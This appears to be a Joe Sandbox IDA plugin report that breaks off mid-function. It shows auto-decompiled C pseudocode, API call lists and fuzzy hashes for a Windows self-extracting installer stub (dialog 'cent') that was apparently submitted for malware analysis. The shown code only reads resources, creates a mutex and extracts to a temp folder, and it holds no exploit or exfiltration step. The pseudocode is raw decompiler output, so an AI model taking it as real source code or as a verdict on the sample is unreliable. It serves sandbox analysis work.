                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-647987826
                                                                                                                                                                                                      • Opcode ID: d0a04679ad355a6385c70b45c52cce406155d4ad9475fb76883c11596892af7c
                                                                                                                                                                                                      • Instruction ID: da00334470451651dafa44282feea9aa32cf9a46239cca3778a86f619e6e7dc8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0a04679ad355a6385c70b45c52cce406155d4ad9475fb76883c11596892af7c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C51E6703412C07EF7615B375C8CFBF6D999B8AF55F504028F645BB1D1CAA89F019261
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0xe9a3c = __ecx;
                                                                                                                                                                                                      				memset(0xe9140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0xe8a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0xe88c0, 0, 0x104);
                                                                                                                                                                                                      				 *0xe93ec = 1;
                                                                                                                                                                                                      				_t20 = E000E468F("TITLE", 0xe9154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0xe858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0xe9a34;
                                                                                                                                                                                                      					if(E000E468F("EXTRACTOPT", 0xe9a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0xe9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0xe9120 =  *0xe9120 & _t65;
                                                                                                                                                                                                      							if(E000E5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0xe8a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe8184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe8a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E000E36EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0xe9a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0xe9a34 & 0x00000100) == 0 || ( *0xe8a38 & 0x00000001) != 0 || E000E18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E000E6517(_t57, 0x7d6, _t34, E000E19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E2390(0xe8a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E000E44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E000E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0xe8588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0xe9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E000E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E000E44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0xe8588);
                                                                                                                                                                                                      										 *0xe9124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x000e2d5d
                                                                                                                                                                                                      0x000e2d69
                                                                                                                                                                                                      0x000e2d6e
                                                                                                                                                                                                      0x000e2f06
                                                                                                                                                                                                      0x000e2f06
                                                                                                                                                                                                      0x000e2f06
                                                                                                                                                                                                      0x000e2d59
                                                                                                                                                                                                      0x000e2f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2CF9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 000E2DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 000E2E0A
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: 22d85b46905d14a1580c40c87d1c720d3360891caa6031eedc4f9fabd0ca47ba
                                                                                                                                                                                                      • Instruction ID: b5aea59c759ae6a0da7696a58412603dba75cdf254a5bb2aa120be233d6d0ab4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22d85b46905d14a1580c40c87d1c720d3360891caa6031eedc4f9fabd0ca47ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C951B7703403D16EF764AB279D8ABBA26DDDB85B00F044039F645F92D2DAB88C419756
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E000E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0xe91d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0xe8584 = _t35;
                                                                                                                                                                                                      					E000E43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0xe8184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E000E4FE0, 0, 0, 0xe8798);
                                                                                                                                                                                                      					 *0xe879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E000E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0xe858c);
                                                                                                                                                                                                      					_t38 =  *0xe8584; // 0x0
                                                                                                                                                                                                      					_t25 = E000E44B9(_t38, 0x4b2, 0xe1140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0xe91d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0xe858c);
                                                                                                                                                                                                      						_t39 =  *0xe879c; // 0x0
                                                                                                                                                                                                      						E000E3680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0xe858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0xe879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 000E3535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 000E3541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 000E355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(000E1140,00000000,00000020,00000004), ref: 000E3590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E35C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 000E35F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 000E35F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 000E3610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 000E3617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E3623
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,000E8798), ref: 000E3637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 000E3671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: 3904f7ed0e49426d484115e23d9fd7d85e1855550ea3900f9534098cf8ca753c
                                                                                                                                                                                                      • Instruction ID: 23e9650fe1425e52a3881e6e181dea030e44ef98576712ff89fa7746cf3d8cfb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3904f7ed0e49426d484115e23d9fd7d85e1855550ea3900f9534098cf8ca753c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1631A8712402C0BFE7601F36AC8DE6A3EA5E7CAF01F108529F715BE2B1CA799900CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E000E4224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E000E44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0xe88c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0xe87a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0xe8598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E000E4200;
                                                                                                                                                                                                      					_v28 = 0xe88c0;
                                                                                                                                                                                                      					 *0xea288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0xea288(_t32, 0xe88c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0xe88c0 != 0) {
                                                                                                                                                                                                      							E000E1680(0xe87a0, 0x104, 0xe88c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xea288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0xe87a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0xe88c0);
                                                                                                                                                                                                      					_t61 = 0xe88c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0xe88c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0xe88c0; // 0x1d1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0xe88c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xe88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 000E4236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 000E424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 000E4263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 000E427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,000E88C0,?,00000001), ref: 000E429F
                                                                                                                                                                                                      • CharPrevA.USER32(000E88C0,001D1181,?,00000001), ref: 000E42C2
                                                                                                                                                                                                      • CharPrevA.USER32(000E88C0,00000000,?,00000001), ref: 000E42D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000E4391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000E43A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: 9dfdbe39d934d3eaabdf4dfa0a02d19a04c3aeec774f78ab6f31257d325e784f
                                                                                                                                                                                                      • Instruction ID: b4e746f8e18da19abde5f7154485174d90fbe905b8da2c8cdf0672719e45fa6b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dfdbe39d934d3eaabdf4dfa0a02d19a04c3aeec774f78ab6f31257d325e784f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3412974A002C0AFE7119F76DCC49AEBFB4EB49744F444069EA45BB251CF788D01C762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
